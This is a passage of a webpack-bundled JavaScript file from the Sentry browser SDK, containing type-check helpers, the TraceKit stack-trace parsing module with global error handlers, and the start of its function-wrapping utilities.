/* Type for Indicator Tags store object */

/***/ }),
/* 514 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["c"] = isError;
/* harmony export (immutable) */ __webpack_exports__["d"] = isErrorEvent;
/* harmony export (immutable) */ __webpack_exports__["a"] = isDOMError;
/* harmony export (immutable) */ __webpack_exports__["b"] = isDOMException;
/* harmony export (immutable) */ __webpack_exports__["h"] = isString;
/* harmony export (immutable) */ __webpack_exports__["f"] = isPrimitive;
/* harmony export (immutable) */ __webpack_exports__["e"] = isPlainObject;
/* harmony export (immutable) */ __webpack_exports__["g"] = isRegExp;
/* harmony export (immutable) */ __webpack_exports__["j"] = isThenable;
/* harmony export (immutable) */ __webpack_exports__["i"] = isSyntheticEvent;
/**
 * Checks whether given value's type is one of a few Error or Error-like
 * {@link isError}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isError(wat) {
    switch (Object.prototype.toString.call(wat)) {
        case '[object Error]':
            return true;
        case '[object Exception]':
            return true;
        case '[object DOMException]':
            return true;
        default:
            return wat instanceof Error;
    }
}
/**
 * Checks whether given value's type is ErrorEvent
 * {@link isErrorEvent}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isErrorEvent(wat) {
    return Object.prototype.toString.call(wat) === '[object ErrorEvent]';
}
/**
 * Checks whether given value's type is DOMError
 * {@link isDOMError}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isDOMError(wat) {
    return Object.prototype.toString.call(wat) === '[object DOMError]';
}
/**
 * Checks whether given value's type is DOMException
 * {@link isDOMException}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isDOMException(wat) {
    return Object.prototype.toString.call(wat) === '[object DOMException]';
}
/**
 * Checks whether given value's type is a string
 * {@link isString}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isString(wat) {
    return Object.prototype.toString.call(wat) === '[object String]';
}
/**
 * Checks whether given value's is a primitive (undefined, null, number, boolean, string)
 * {@link isPrimitive}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isPrimitive(wat) {
    return wat === null || (typeof wat !== 'object' && typeof wat !== 'function');
}
/**
 * Checks whether given value's type is an object literal
 * {@link isPlainObject}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isPlainObject(wat) {
    return Object.prototype.toString.call(wat) === '[object Object]';
}
/**
 * Checks whether given value's type is an regexp
 * {@link isRegExp}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isRegExp(wat) {
    return Object.prototype.toString.call(wat) === '[object RegExp]';
}
/**
 * Checks whether given value has a then function.
 * @param wat A value to be checked.
 */
function isThenable(wat) {
    // tslint:disable:no-unsafe-any
    return Boolean(wat && wat.then && typeof wat.then === 'function');
    // tslint:enable:no-unsafe-any
}
/**
 * Checks whether given value's type is a SyntheticEvent
 * {@link isSyntheticEvent}.
 *
 * @param wat A value to be checked.
 * @returns A boolean representing the result.
 */
function isSyntheticEvent(wat) {
    // tslint:disable-next-line:no-unsafe-any
    return isPlainObject(wat) && 'nativeEvent' in wat && 'preventDefault' in wat && 'stopPropagation' in wat;
}
//# sourceMappingURL=is.js.map

/***/ }),
/* 515 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return _subscribe; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return _installGlobalHandler; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return _installGlobalUnhandledRejectionHandler; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return _computeStackTrace; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);
// tslint:disable


/**
 * TraceKit - Cross brower stack traces
 *
 * This was originally forked from github.com/occ/TraceKit, but has since been
 * largely modified and is now maintained as part of Sentry JS SDK.
 *
 * NOTE: Last merge with upstream repository
 * Jul 11,2018 - #f03357c
 *
 * https://github.com/csnover/TraceKit
 * @license MIT
 * @namespace TraceKit
 */
var window = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["i" /* getGlobalObject */])();
var TraceKit = {
    _report: false,
    _collectWindowErrors: false,
    _computeStackTrace: false,
    _linesOfContext: false,
};
// var TraceKit: TraceKitInterface = {};
// var TraceKit = {};
// global reference to slice
var UNKNOWN_FUNCTION = '?';
// https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error#Error_types
var ERROR_TYPES_RE = /^(?:[Uu]ncaught (?:exception: )?)?(?:((?:Eval|Internal|Range|Reference|Syntax|Type|URI|)Error): )?(.*)$/;
/**
 * A better form of hasOwnProperty<br/>
 * Example: `_has(MainHostObject, property) === true/false`
 *
 * @param {Object} object to check property
 * @param {string} key to check
 * @return {Boolean} true if the object has the key and it is not inherited
 */
function _has(object, key) {
    return Object.prototype.hasOwnProperty.call(object, key);
}
/**
 * A safe form of location.href<br/>
 *
 * @return {string} location.href
 */
function getLocationHref() {
    if (typeof document === 'undefined' || document.location == null)
        return '';
    return document.location.href;
}
/**
 * Cross-browser processing of unhandled exceptions
 *
 * Syntax:
 * ```js
 *   TraceKit.report.subscribe(function(stackInfo) { ... })
 *   TraceKit.report(exception)
 *   try { ...code... } catch(ex) { TraceKit.report(ex); }
 * ```
 *
 * Supports:
 *   - Firefox: full stack trace with line numbers, plus column number
 *     on top frame; column number is not guaranteed
 *   - Opera: full stack trace with line and column numbers
 *   - Chrome: full stack trace with line and column numbers
 *   - Safari: line and column number for the top frame only; some frames
 *     may be missing, and column number is not guaranteed
 *   - IE: line and column number for the top frame only; some frames
 *     may be missing, and column number is not guaranteed
 *
 * In theory, TraceKit should work on all of the following versions:
 *   - IE5.5+ (only 8.0 tested)
 *   - Firefox 0.9+ (only 3.5+ tested)
 *   - Opera 7+ (only 10.50 tested; versions 9 and earlier may require
 *     Exceptions Have Stacktrace to be enabled in opera:config)
 *   - Safari 3+ (only 4+ tested)
 *   - Chrome 1+ (only 5+ tested)
 *   - Konqueror 3.5+ (untested)
 *
 * Requires TraceKit._computeStackTrace.
 *
 * Tries to catch all unhandled exceptions and report them to the
 * subscribed handlers. Please note that TraceKit.report will rethrow the
 * exception. This is REQUIRED in order to get a useful stack trace in IE.
 * If the exception does not reach the top of the browser, you will only
 * get a stack trace from the point where TraceKit.report was called.
 *
 * Handlers receive a TraceKit.StackTrace object as described in the
 * TraceKit._computeStackTrace docs.
 *
 * @memberof TraceKit
 * @namespace
 */
TraceKit._report = (function reportModuleWrapper() {
    var handlers = [], lastException = null, lastExceptionStack = null;
    /**
     * Add a crash handler.
     * @param {Function} handler
     * @memberof TraceKit.report
     */
    function _subscribe(handler) {
        // NOTE: We call both handlers manually in browser/integrations/globalhandler.ts
        // So user can choose which one he wants to attach
        // installGlobalHandler();
        // installGlobalUnhandledRejectionHandler();
        handlers.push(handler);
    }
    /**
     * Dispatch stack information to all handlers.
     * @param {TraceKit.StackTrace} stack
     * @param {boolean} isWindowError Is this a top-level window error?
     * @param {Error=} error The error that's being handled (if available, null otherwise)
     * @memberof TraceKit.report
     * @throws An exception if an error occurs while calling an handler.
     */
    function _notifyHandlers(stack, isWindowError, error) {
        var exception = null;
        if (isWindowError && !TraceKit._collectWindowErrors) {
            return;
        }
        for (var i in handlers) {
            if (_has(handlers, i)) {
                try {
                    handlers[i](stack, isWindowError, error);
                }
                catch (inner) {
                    exception = inner;
                }
            }
        }
        if (exception) {
            throw exception;
        }
    }
    var _oldOnerrorHandler, _onErrorHandlerInstalled;
    /**
     * Ensures all global unhandled exceptions are recorded.
     * Supported by Gecko and IE.
     * @param {string} message Error message.
     * @param {string} url URL of script that generated the exception.
     * @param {(number|string)} lineNo The line number at which the error occurred.
     * @param {(number|string)=} columnNo The column number at which the error occurred.
     * @param {Error=} errorObj The actual Error object.
     * @memberof TraceKit.report
     */
    function _traceKitWindowOnError(message, url, lineNo, columnNo, errorObj) {
        var stack = null;
        // If 'errorObj' is ErrorEvent, get real Error from inside
        errorObj = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["m" /* isErrorEvent */])(errorObj) ? errorObj.error : errorObj;
        // If 'message' is ErrorEvent, get real message from inside
        message = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["m" /* isErrorEvent */])(message) ? message.message : message;
        if (lastExceptionStack) {
            TraceKit._computeStackTrace._augmentStackTraceWithInitialElement(lastExceptionStack, url, lineNo, message);
            processLastException();
        }
        else if (errorObj && Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["l" /* isError */])(errorObj)) {
            stack = TraceKit._computeStackTrace(errorObj);
            stack.mechanism = 'onerror';
            _notifyHandlers(stack, true, errorObj);
        }
        else {
            var location = {
                url: url,
                line: lineNo,
                column: columnNo,
            };
            var name;
            var msg = message; // must be new var or will modify original `arguments`
            if ({}.toString.call(message) === '[object String]') {
                var groups = message.match(ERROR_TYPES_RE);
                if (groups) {
                    name = groups[1];
                    msg = groups[2];
                }
            }
            location.func = UNKNOWN_FUNCTION;
            location.context = null;
            stack = {
                name: name,
                message: msg,
                mode: 'onerror',
                mechanism: 'onerror',
                stack: [
                    __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, location, { 
                        // Firefox sometimes doesn't return url correctly and this is an old behavior
                        // that I prefer to port here as well.
                        // It can be altered only here, as previously it's using `location.url` for other things — Kamil
                        url: location.url || getLocationHref() }),
                ],
            };
            _notifyHandlers(stack, true, null);
        }
        if (_oldOnerrorHandler) {
            // @ts-ignore
            return _oldOnerrorHandler.apply(this, arguments);
        }
        return false;
    }
    /**
     * Ensures all unhandled rejections are recorded.
     * @param {PromiseRejectionEvent} e event.
     * @memberof TraceKit.report
     * @see https://developer.mozilla.org/en-US/docs/Web/API/WindowEventHandlers/onunhandledrejection
     * @see https://developer.mozilla.org/en-US/docs/Web/API/PromiseRejectionEvent
     */
    function _traceKitWindowOnUnhandledRejection(e) {
        var err = (e && (e.detail ? e.detail.reason : e.reason)) || e;
        var stack = TraceKit._computeStackTrace(err);
        stack.mechanism = 'onunhandledrejection';
        if (!stack.message) {
            stack.message = JSON.stringify(Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(err));
        }
        _notifyHandlers(stack, true, err);
    }
    /**
     * Install a global onerror handler
     * @memberof TraceKit.report
     */
    function _installGlobalHandler() {
        if (_onErrorHandlerInstalled === true) {
            return;
        }
        _oldOnerrorHandler = window.onerror;
        window.onerror = _traceKitWindowOnError;
        _onErrorHandlerInstalled = true;
    }
    /**
     * Install a global onunhandledrejection handler
     * @memberof TraceKit.report
     */
    function _installGlobalUnhandledRejectionHandler() {
        window.onunhandledrejection = _traceKitWindowOnUnhandledRejection;
    }
    /**
     * Process the most recent exception
     * @memberof TraceKit.report
     */
    function processLastException() {
        var _lastExceptionStack = lastExceptionStack, _lastException = lastException;
        lastExceptionStack = null;
        lastException = null;
        _notifyHandlers(_lastExceptionStack, false, _lastException);
    }
    /**
     * Reports an unhandled Error to TraceKit.
     * @param {Error} ex
     * @memberof TraceKit.report
     * @throws An exception if an incomplete stack trace is detected (old IE browsers).
     */
    function _report(ex) {
        if (lastExceptionStack) {
            if (lastException === ex) {
                return; // already caught by an inner catch block, ignore
            }
            else {
                processLastException();
            }
        }
        var stack = TraceKit._computeStackTrace(ex);
        lastExceptionStack = stack;
        lastException = ex;
        // If the stack trace is incomplete, wait for 2 seconds for
        // slow slow IE to see if onerror occurs or not before reporting
        // this exception; otherwise, we will end up with an incomplete
        // stack trace
        setTimeout(function () {
            if (lastException === ex) {
                processLastException();
            }
        }, stack.incomplete ? 2000 : 0);
        throw ex; // re-throw to propagate to the top level (and cause window.onerror)
    }
    _report._subscribe = _subscribe;
    _report._installGlobalHandler = _installGlobalHandler;
    _report._installGlobalUnhandledRejectionHandler = _installGlobalUnhandledRejectionHandler;
    return _report;
})();
/**
 * An object representing a single stack frame.
 * @typedef {Object} StackFrame
 * @property {string} url The JavaScript or HTML file URL.
 * @property {string} func The function name, or empty for anonymous functions (if guessing did not work).
 * @property {string[]?} args The arguments passed to the function, if known.
 * @property {number=} line The line number, if known.
 * @property {number=} column The column number, if known.
 * @property {string[]} context An array of source code lines; the middle element corresponds to the correct line#.
 * @memberof TraceKit
 */
/**
 * An object representing a JavaScript stack trace.
 * @typedef {Object} StackTrace
 * @property {string} name The name of the thrown exception.
 * @property {string} message The exception error message.
 * @property {TraceKit.StackFrame[]} stack An array of stack frames.
 * @property {string} mode 'stack', 'stacktrace', 'multiline', 'callers', 'onerror', or 'failed' -- method used to collect the stack trace.
 * @memberof TraceKit
 */
/**
 * TraceKit._computeStackTrace: cross-browser stack traces in JavaScript
 *
 * Syntax:
 *   ```js
 *   s = TraceKit._computeStackTrace(exception) // consider using TraceKit.report instead (see below)
 *   ```
 *
 * Supports:
 *   - Firefox:  full stack trace with line numbers and unreliable column
 *               number on top frame
 *   - Opera 10: full stack trace with line and column numbers
 *   - Opera 9-: full stack trace with line numbers
 *   - Chrome:   full stack trace with line and column numbers
 *   - Safari:   line and column number for the topmost stacktrace element
 *               only
 *   - IE:       no line numbers whatsoever
 *
 * Tries to guess names of anonymous functions by looking for assignments
 * in the source code. In IE and Safari, we have to guess source file names
 * by searching for function bodies inside all page scripts. This will not
 * work for scripts that are loaded cross-domain.
 * Here be dragons: some function names may be guessed incorrectly, and
 * duplicate functions may be mismatched.
 *
 * TraceKit._computeStackTrace should only be used for tracing purposes.
 * Logging of unhandled exceptions should be done with TraceKit.report,
 * which builds on top of TraceKit._computeStackTrace and provides better
 * IE support by utilizing the window.onerror event to retrieve information
 * about the top of the stack.
 *
 * Note: In IE and Safari, no stack trace is recorded on the Error object,
 * so computeStackTrace instead walks its *own* chain of callers.
 * This means that:
 *  * in Safari, some methods may be missing from the stack trace;
 *  * in IE, the topmost function in the stack trace will always be the
 *    caller of computeStackTrace.
 *
 * This is okay for tracing (because you are likely to be calling
 * computeStackTrace from the function you want to be the topmost element
 * of the stack trace anyway), but not okay for logging unhandled
 * exceptions (because your catch block will likely be far away from the
 * inner function that actually caused the exception).
 *
 * @memberof TraceKit
 * @namespace
 */
TraceKit._computeStackTrace = (function _computeStackTraceWrapper() {
    // Contents of Exception in various browsers.
    //
    // SAFARI:
    // ex.message = Can't find variable: qq
    // ex.line = 59
    // ex.sourceId = 580238192
    // ex.sourceURL = http://...
    // ex.expressionBeginOffset = 96
    // ex.expressionCaretOffset = 98
    // ex.expressionEndOffset = 98
    // ex.name = ReferenceError
    //
    // FIREFOX:
    // ex.message = qq is not defined
    // ex.fileName = http://...
    // ex.lineNumber = 59
    // ex.columnNumber = 69
    // ex.stack = ...stack trace... (see the example below)
    // ex.name = ReferenceError
    //
    // CHROME:
    // ex.message = qq is not defined
    // ex.name = ReferenceError
    // ex.type = not_defined
    // ex.arguments = ['aa']
    // ex.stack = ...stack trace...
    //
    // INTERNET EXPLORER:
    // ex.message = ...
    // ex.name = ReferenceError
    //
    // OPERA:
    // ex.message = ...message... (see the example below)
    // ex.name = ReferenceError
    // ex.opera#sourceloc = 11  (pretty much useless, duplicates the info in ex.message)
    // ex.stacktrace = n/a; see 'opera:config#UserPrefs|Exceptions Have Stacktrace'
    /**
     * Computes stack trace information from the stack property.
     * Chrome and Gecko use this property.
     * @param {Error} ex
     * @return {?TraceKit.StackTrace} Stack trace information.
     * @memberof TraceKit._computeStackTrace
     */
    function _computeStackTraceFromStackProp(ex) {
        if (!ex || !ex.stack) {
            return null;
        }
        // Chromium based browsers: Chrome, Brave, new Opera, new Edge
        var chrome = /^\s*at (?:(.*?) ?\()?((?:file|https?|blob|chrome-extension|native|eval|webpack|<anonymous>|[a-z]:|\/).*?)(?::(\d+))?(?::(\d+))?\)?\s*$/i, 
        // gecko regex: `(?:bundle|\d+\.js)`: `bundle` is for react native, `\d+\.js` also but specifically for ram bundles because it
        // generates filenames without a prefix like `file://` the filenames in the stacktrace are just 42.js
        // We need this specific case for now because we want no other regex to match.
        gecko = /^\s*(.*?)(?:\((.*?)\))?(?:^|@)?((?:file|https?|blob|chrome|webpack|resource|moz-extension).*?:\/.*?|\[native code\]|[^@]*(?:bundle|\d+\.js))(?::(\d+))?(?::(\d+))?\s*$/i, winjs = /^\s*at (?:((?:\[object object\])?.+) )?\(?((?:file|ms-appx|https?|webpack|blob):.*?):(\d+)(?::(\d+))?\)?\s*$/i, 
        // Used to additionally parse URL/line/column from eval frames
        isEval, geckoEval = /(\S+) line (\d+)(?: > eval line \d+)* > eval/i, chromeEval = /\((\S*)(?::(\d+))(?::(\d+))\)/, lines = ex.stack.split('\n'), stack = [], submatch, parts, element, reference = /^(.*) is undefined$/.exec(ex.message);
        for (var i = 0, j = lines.length; i < j; ++i) {
            if ((parts = chrome.exec(lines[i]))) {
                var isNative = parts[2] && parts[2].indexOf('native') === 0; // start of line
                isEval = parts[2] && parts[2].indexOf('eval') === 0; // start of line
                if (isEval && (submatch = chromeEval.exec(parts[2]))) {
                    // throw out eval line/column and use top-most line/column number
                    parts[2] = submatch[1]; // url
                    parts[3] = submatch[2]; // line
                    parts[4] = submatch[3]; // column
                }
                element = {
                    url: parts[2],
                    func: parts[1] || UNKNOWN_FUNCTION,
                    args: isNative ? [parts[2]] : [],
                    line: parts[3] ? +parts[3] : null,
                    column: parts[4] ? +parts[4] : null,
                };
            }
            else if ((parts = winjs.exec(lines[i]))) {
                element = {
                    url: parts[2],
                    func: parts[1] || UNKNOWN_FUNCTION,
                    args: [],
                    line: +parts[3],
                    column: parts[4] ? +parts[4] : null,
                };
            }
            else if ((parts = gecko.exec(lines[i]))) {
                isEval = parts[3] && parts[3].indexOf(' > eval') > -1;
                if (isEval && (submatch = geckoEval.exec(parts[3]))) {
                    // throw out eval line/column and use top-most line number
                    parts[1] = parts[1] || "eval";
                    parts[3] = submatch[1];
                    parts[4] = submatch[2];
                    parts[5] = ''; // no column when eval
                }
                else if (i === 0 && !parts[5] && ex.columnNumber !== void 0) {
                    // FireFox uses this awesome columnNumber property for its top frame
                    // Also note, Firefox's column number is 0-based and everything else expects 1-based,
                    // so adding 1
                    // NOTE: this hack doesn't work if top-most frame is eval
                    stack[0].column = ex.columnNumber + 1;
                }
                element = {
                    url: parts[3],
                    func: parts[1] || UNKNOWN_FUNCTION,
                    args: parts[2] ? parts[2].split(',') : [],
                    line: parts[4] ? +parts[4] : null,
                    column: parts[5] ? +parts[5] : null,
                };
            }
            else {
                continue;
            }
            if (!element.func && element.line) {
                element.func = UNKNOWN_FUNCTION;
            }
            element.context = null;
            stack.push(element);
        }
        if (!stack.length) {
            return null;
        }
        if (stack[0] && stack[0].line && !stack[0].column && reference) {
            stack[0].column = null;
        }
        return {
            mode: 'stack',
            name: ex.name,
            message: ex.message,
            stack: stack,
        };
    }
    /**
     * Computes stack trace information from the stacktrace property.
     * Opera 10+ uses this property.
     * @param {Error} ex
     * @return {?TraceKit.StackTrace} Stack trace information.
     * @memberof TraceKit._computeStackTrace
     */
    function _computeStackTraceFromStacktraceProp(ex) {
        // Access and store the stacktrace property before doing ANYTHING
        // else to it because Opera is not very good at providing it
        // reliably in other circumstances.
        var stacktrace = ex.stacktrace;
        if (!stacktrace) {
            return;
        }
        var opera10Regex = / line (\d+).*script (?:in )?(\S+)(?:: in function (\S+))?$/i, opera11Regex = / line (\d+), column (\d+)\s*(?:in (?:<anonymous function: ([^>]+)>|([^\)]+))\((.*)\))? in (.*):\s*$/i, lines = stacktrace.split('\n'), stack = [], parts;
        for (var line = 0; line < lines.length; line += 2) {
            var element = null;
            if ((parts = opera10Regex.exec(lines[line]))) {
                element = {
                    url: parts[2],
                    line: +parts[1],
                    column: null,
                    func: parts[3],
                    args: [],
                };
            }
            else if ((parts = opera11Regex.exec(lines[line]))) {
                element = {
                    url: parts[6],
                    line: +parts[1],
                    column: +parts[2],
                    func: parts[3] || parts[4],
                    args: parts[5] ? parts[5].split(',') : [],
                };
            }
            if (element) {
                if (!element.func && element.line) {
                    element.func = UNKNOWN_FUNCTION;
                }
                if (element.line) {
                    element.context = null;
                }
                if (!element.context) {
                    element.context = [lines[line + 1]];
                }
                stack.push(element);
            }
        }
        if (!stack.length) {
            return null;
        }
        return {
            mode: 'stacktrace',
            name: ex.name,
            message: ex.message,
            stack: stack,
        };
    }
    /**
     * NOT TESTED.
     * Computes stack trace information from an error message that includes
     * the stack trace.
     * Opera 9 and earlier use this method if the option to show stack
     * traces is turned on in opera:config.
     * @param {Error} ex
     * @return {?TraceKit.StackTrace} Stack information.
     * @memberof TraceKit._computeStackTrace
     */
    function _computeStackTraceFromOperaMultiLineMessage(ex) {
        // TODO: Clean this function up
        // Opera includes a stack trace into the exception message. An example is:
        //
        // Statement on line 3: Undefined variable: undefinedFunc
        // Backtrace:
        //   Line 3 of linked script file://localhost/Users/andreyvit/Projects/TraceKit/javascript-client/sample.js: In function zzz
        //         undefinedFunc(a);
        //   Line 7 of inline#1 script in file://localhost/Users/andreyvit/Projects/TraceKit/javascript-client/sample.html: In function yyy
        //           zzz(x, y, z);
        //   Line 3 of inline#1 script in file://localhost/Users/andreyvit/Projects/TraceKit/javascript-client/sample.html: In function xxx
        //           yyy(a, a, a);
        //   Line 1 of function script
        //     try { xxx('hi'); return false; } catch(ex) { TraceKit.report(ex); }
        //   ...
        var lines = ex.message.split('\n');
        if (lines.length < 4) {
            return null;
        }
        var lineRE1 = /^\s*Line (\d+) of linked script ((?:file|https?|blob)\S+)(?:: in function (\S+))?\s*$/i, lineRE2 = /^\s*Line (\d+) of inline#(\d+) script in ((?:file|https?|blob)\S+)(?:: in function (\S+))?\s*$/i, lineRE3 = /^\s*Line (\d+) of function script\s*$/i, stack = [], scripts = window && window.document && window.document.getElementsByTagName('script'), inlineScriptBlocks = [], parts;
        for (var s in scripts) {
            if (_has(scripts, s) && !scripts[s].src) {
                inlineScriptBlocks.push(scripts[s]);
            }
        }
        for (var line = 2; line < lines.length; line += 2) {
            var item = null;
            if ((parts = lineRE1.exec(lines[line]))) {
                item = {
                    url: parts[2],
                    func: parts[3],
                    args: [],
                    line: +parts[1],
                    column: null,
                };
            }
            else if ((parts = lineRE2.exec(lines[line]))) {
                item = {
                    url: parts[3],
                    func: parts[4],
                    args: [],
                    line: +parts[1],
                    column: null,
                };
            }
            else if ((parts = lineRE3.exec(lines[line]))) {
                var url = getLocationHref().replace(/#.*$/, '');
                item = {
                    url: url,
                    func: '',
                    args: [],
                    line: parts[1],
                    column: null,
                };
            }
            if (item) {
                if (!item.func) {
                    item.func = UNKNOWN_FUNCTION;
                }
                // if (context) alert("Context mismatch. Correct midline:\n" + lines[i+1] + "\n\nMidline:\n" + midline + "\n\nContext:\n" + context.join("\n") + "\n\nURL:\n" + item.url);
                item.context = [lines[line + 1]];
                stack.push(item);
            }
        }
        if (!stack.length) {
            return null; // could not parse multiline exception message as Opera stack trace
        }
        return {
            mode: 'multiline',
            name: ex.name,
            message: lines[0],
            stack: stack,
        };
    }
    /**
     * Adds information about the first frame to incomplete stack traces.
     * Safari and IE require this to get complete data on the first frame.
     * @param {TraceKit.StackTrace} stackInfo Stack trace information from
     * one of the compute* methods.
     * @param {string} url The URL of the script that caused an error.
     * @param {(number|string)} lineNo The line number of the script that
     * caused an error.
     * @param {string=} message The error generated by the browser, which
     * hopefully contains the name of the object that caused the error.
     * @return {boolean} Whether or not the stack information was
     * augmented.
     * @memberof TraceKit._computeStackTrace
     */
    function _augmentStackTraceWithInitialElement(stackInfo, url, lineNo, message) {
        var initial = {
            url: url,
            line: lineNo,
        };
        if (initial.url && initial.line) {
            stackInfo.incomplete = false;
            if (!initial.func) {
                initial.func = UNKNOWN_FUNCTION;
            }
            if (!initial.context) {
                initial.context = null;
            }
            var reference = / '([^']+)' /.exec(message);
            if (reference) {
                initial.column = null;
            }
            if (stackInfo.stack.length > 0) {
                if (stackInfo.stack[0].url === initial.url) {
                    if (stackInfo.stack[0].line === initial.line) {
                        return false; // already in stack trace
                    }
                    else if (!stackInfo.stack[0].line && stackInfo.stack[0].func === initial.func) {
                        stackInfo.stack[0].line = initial.line;
                        stackInfo.stack[0].context = initial.context;
                        return false;
                    }
                }
            }
            stackInfo.stack.unshift(initial);
            stackInfo.partial = true;
            return true;
        }
        else {
            stackInfo.incomplete = true;
        }
        return false;
    }
    /**
     * Computes stack trace information by walking the arguments.caller
     * chain at the time the exception occurred. This will cause earlier
     * frames to be missed but is the only way to get any stack trace in
     * Safari and IE. The top frame is restored by
     * {@link augmentStackTraceWithInitialElement}.
     * @param {Error} ex
     * @return {TraceKit.StackTrace=} Stack trace information.
     * @memberof TraceKit._computeStackTrace
     */
    function _computeStackTraceByWalkingCallerChain(ex, depth) {
        var functionName = /function\s+([_$a-zA-Z\xA0-\uFFFF][_$a-zA-Z0-9\xA0-\uFFFF]*)?\s*\(/i, stack = [], funcs = {}, recursion = false, parts, item;
        for (var curr = _computeStackTraceByWalkingCallerChain.caller; curr && !recursion; curr = curr.caller) {
            if (curr === _computeStackTrace || curr === TraceKit._report) {
                continue;
            }
            item = {
                url: null,
                func: UNKNOWN_FUNCTION,
                args: [],
                line: null,
                column: null,
            };
            if (curr.name) {
                item.func = curr.name;
            }
            else if ((parts = functionName.exec(curr.toString()))) {
                item.func = parts[1];
            }
            if (typeof item.func === 'undefined') {
                try {
                    item.func = parts.input.substring(0, parts.input.indexOf('{'));
                }
                catch (e) { }
            }
            if (funcs['' + curr]) {
                recursion = true;
            }
            else {
                funcs['' + curr] = true;
            }
            stack.push(item);
        }
        if (depth) {
            stack.splice(0, depth);
        }
        var result = {
            mode: 'callers',
            name: ex.name,
            message: ex.message,
            stack: stack,
        };
        _augmentStackTraceWithInitialElement(result, ex.sourceURL || ex.fileName, ex.line || ex.lineNumber, ex.message || ex.description);
        return result;
    }
    /**
     * Computes a stack trace for an exception.
     * @param {Error} ex
     * @param {(string|number)=} depth
     * @memberof TraceKit._computeStackTrace
     */
    function computeStackTrace(ex, depth) {
        var stack = null;
        depth = depth == null ? 0 : +depth;
        try {
            // This must be tried first because Opera 10 *destroys*
            // its stacktrace property if you try to access the stack
            // property first!!
            stack = _computeStackTraceFromStacktraceProp(ex);
            if (stack) {
                return stack;
            }
        }
        catch (e) { }
        try {
            stack = _computeStackTraceFromStackProp(ex);
            if (stack) {
                return stack;
            }
        }
        catch (e) { }
        try {
            stack = _computeStackTraceFromOperaMultiLineMessage(ex);
            if (stack) {
                return stack;
            }
        }
        catch (e) { }
        try {
            stack = _computeStackTraceByWalkingCallerChain(ex, depth + 1);
            if (stack) {
                return stack;
            }
        }
        catch (e) { }
        return {
            original: ex,
            name: ex.name,
            message: ex.message,
            mode: 'failed',
        };
    }
    computeStackTrace._augmentStackTraceWithInitialElement = _augmentStackTraceWithInitialElement;
    computeStackTrace._computeStackTraceFromStackProp = _computeStackTraceFromStackProp;
    return computeStackTrace;
})();
TraceKit._collectWindowErrors = true;
TraceKit._linesOfContext = 11;
var _subscribe = TraceKit._report._subscribe;
var _installGlobalHandler = TraceKit._report._installGlobalHandler;
var _installGlobalUnhandledRejectionHandler = TraceKit._report._installGlobalUnhandledRejectionHandler;
var _computeStackTrace = TraceKit._computeStackTrace;

//# sourceMappingURL=tracekit.js.map

/***/ }),
/* 516 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["c"] = shouldIgnoreOnError;
/* unused harmony export ignoreNextOnError */
/* harmony export (immutable) */ __webpack_exports__["d"] = wrap;
/* harmony export (immutable) */ __webpack_exports__["a"] = breadcrumbEventHandler;
/* harmony export (immutable) */ __webpack_exports__["b"] = keypressEventHandler;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);



var debounceDuration = 1000;
var keypressTimeout;
var lastCapturedEvent;
var ignoreOnError = 0;
/**
 * @hidden
 */
function shouldIgnoreOnError() {
    return ignoreOnError > 0;
}
/**
 * @hidden
 */
function ignoreNextOnError() {
    // onerror should trigger before setTimeout
    ignoreOnError += 1;
    setTimeout(function () {
        ignoreOnError -= 1;
    });
}
/**
 * Instruments the given function and sends an event to Sentry every time the
 * function throws an exception.
 *
 * @param fn A function to wrap.
 * @returns The wrapped function.
 * @hidden
 */
function wrap(fn, options, before) {
    if (options === void 0) { options = {}; }
    // tslint:disable-next-line:strict-type-predicates
    if (typeof fn !== 'function') {
        return fn;
    }
    try {
        // We don't wanna wrap it twice
        if (fn.__sentry__) {
            return fn;
        }
        // If this has already been wrapped in the past, return that wrapped function
        if (fn.__sentry_wrapped__) {
            return fn.__sentry_wrapped__;
        }
    }
    catch (e) {
        // Just accessing custom props in some Selenium environments
        // can cause a "Permission denied" exception (see raven-js#495).
        // Bail on wrapping and return the function as-is (defers to window.onerror).
        return fn;
    }
    var sentryWrapped = function () {
        // tslint:disable-next-line:strict-type-predicates
        if (before && typeof before === 'function') {
            before.apply(this, arguments);
        }
        var args = Array.prototype.slice.call(arguments);
        // tslint:disable:no-unsafe-any
        try {
            // Attempt to invoke user-land function
            // NOTE: If you are a Sentry user, and you are seeing this stack frame, it
            //       means the sentry.javascript SDK caught an error invoking your application code. This
            //       is expected behavior and NOT indicative of a bug with sentry.javascript.
